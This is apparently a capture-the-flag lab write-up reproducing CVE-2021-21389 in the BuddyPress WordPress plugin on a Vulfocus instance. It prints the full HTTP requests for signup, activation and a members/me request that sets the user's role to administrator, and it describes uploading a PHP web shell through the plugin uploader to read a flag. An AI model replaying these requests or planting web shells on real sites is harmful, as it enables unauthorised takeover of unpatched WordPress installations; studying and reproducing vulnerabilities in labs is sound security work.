vulfocus/wordpress_cve-2021-21389 concise write-up + vulnerability reproduction

0x01 Vulnerability description

Name: vulfocus/wordpress_cve-2021-21389:latest

Description:

BuddyPress is an open source WordPress plugin for building community sites. In BuddyPress from 5.0.0 before 7.2.1, a non-privileged regular user can obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability is fixed in BuddyPress 7.2.1; existing installations of the plugin should update to that version to mitigate the issue.


0x02 Approach

Register and get past activation without mailbox access (the activation key is exposed in the signup response), then log in with the new account.

Once logged in, change your own roles to administrator; this is where the vulnerability lies.

As administrator, upload a web shell and read the flag.

0x03 Exploit

1. Register first. Find the activation key in the response, then send the activation request with that key.


poc:

POST //wp-json/buddypress/v1/signup HTTP/1.1
Host: 123.5...:10592
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Referer: http://123.58.224.8:10592/register/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json; charset=UTF-8

{"user_login": "aaaa1111", "user_email": "a@1.com", "user_name": "aaaa1111", "password": "aaaa1111"}

2. Activate (paste the activation key into the URL).


poc:

PUT //wp-json/buddypress/v1/signup/activate/rPEQXD2Ml3i9sEeKpCUMjEere7IAhhdn HTTP/1.1
Host: 123...10592
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Referer: http://123.58.224.8:10592/register/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json; charset=UTF-8

{"user_login": "aaaa1111", "user_email": "a@1.com", "user_name": "aaaa1111", "password": "aaaa1111"}

3. Log in again with the account and password and open the page below; click manage first, then member and ban, and capture that request to get the information needed:

http://123.58.224.8:10592/groups/create/step/group-details/


Copy the Cookie and the X-WP-Nonce from that request.


4. Paste that information into a new request and set roles to administrator.


poc:

POST /wp-json/buddypress/v1/members/me HTTP/1.1
Host: 123.5...10592
X-WP-Nonce: 054b46d285
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/json; charset=UTF-8
Cookie: wordpress_test_cookie=WP%20Cookie%20check; comment_author_255b0c20a0aa63e958df970dee81edbc=1; comment_author_email_255b0c20a0aa63e958df970dee81edbc=1%401.com; comment_author_url_255b0c20a0aa63e958df970dee81edbc=http%3A%2F%2Fbb.com; wordpress_logged_in_6added4e67aeefea26fd262ac40e789a=aaaa1111%7C1776320615%7CwHAdVSP9w1iim4QpazxgOTofTbc5Y8LPA8m1CQYOMmy%7C1f735edde34aaa9900c9e6f87e7d403436b14ab40e4f2d85aaea38c245cb737d; wp-settings-time-3=1776147911
X-HTTP-Method-Override: PUT
Content-Length: 26

{"roles": "administrator"}

5. Reload the page: the account now shows as administrator, so go ahead and upload the web shell.


Upload point: Upload Plugin under Plugins.


After uploading the web shell, find where the file ended up; opening it makes the server parse and execute it:

http://123.58.224.8:42678/wp-content/uploads/

shell.php is our web shell; open it and connect with AntSword (蚁剑).


The flag is under /tmp.
